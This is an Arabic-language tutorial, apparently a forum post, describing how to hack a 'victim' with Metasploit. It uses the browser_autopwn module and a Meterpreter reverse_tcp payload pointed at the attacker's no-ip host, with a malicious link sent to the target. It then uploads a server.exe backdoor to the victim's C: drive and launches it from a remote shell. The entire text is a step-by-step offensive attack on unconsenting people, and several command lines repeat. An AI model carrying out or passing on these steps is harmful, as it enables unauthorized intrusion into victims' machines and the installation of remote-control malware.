:سينقسم الشرح على قسمين
القسم الاول : اختراق الضحية
القسم الثانى : رفع الباتش فى جهاز الضحية و تشغيله
نبدآ بسم الله
لتحميل اخر اصدار من البرنامج من موقعه الرسمى
اولآ : هتفتح الميتا و تكتب فية الامر دا
search autopw
بعد تكتب الامر
use auxiliary/server/browser_autopwn
use auxiliary/server/browser_autopwn
بعد كدا نكتب امر استعراض متطلبات الثغرة
show options
بعد نختار البايلود بالامر التالى
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set LHOST xxxxx.no-ip.orgبعد نكتبxxxxx بدل
حط النو اى بى بتاعك او الاى بى الخارجى لك
بعد نكتبset uripath /
بعد نكتب
exploit
ملحوظة : الاستغلال ياخد وقت حسب سرعة النت عندك
LHOSTبعد يجب أن يكون عندك لينك مكتوب فية اسم النو اى بى متاعك او الاى بى
الخارجى الى انتا كتبتو وبجانبه بورت 8080 تعطي الرابط للضحية و يتم الاختراق
طيب ننتقل للجزء الثانى من الشرح و هو رفع الباتش فى جهاز الضحية
الاول نكتب الامر sessions -i 1
ثم نكتب الامر
\:upload /user/Desktop/server.exe c
الاول نكتب الامر sessions -i 1
ثم نكتب الامر
\:upload /user/Desktop/server.exe c
مكان user اعملو حسب اسم حساب الدخول فى الويندوز عندك
و انصحك تحط السيرفر على الديسك توب
بعدين نكتب الامر
shell
للدخول للدوس عند الضحيه
وبعد تدخل للمكان الي رفعت فيه سيرفرك انا هنا حددت السي\:c
وتكتب الامر
start server.exe
start server.exe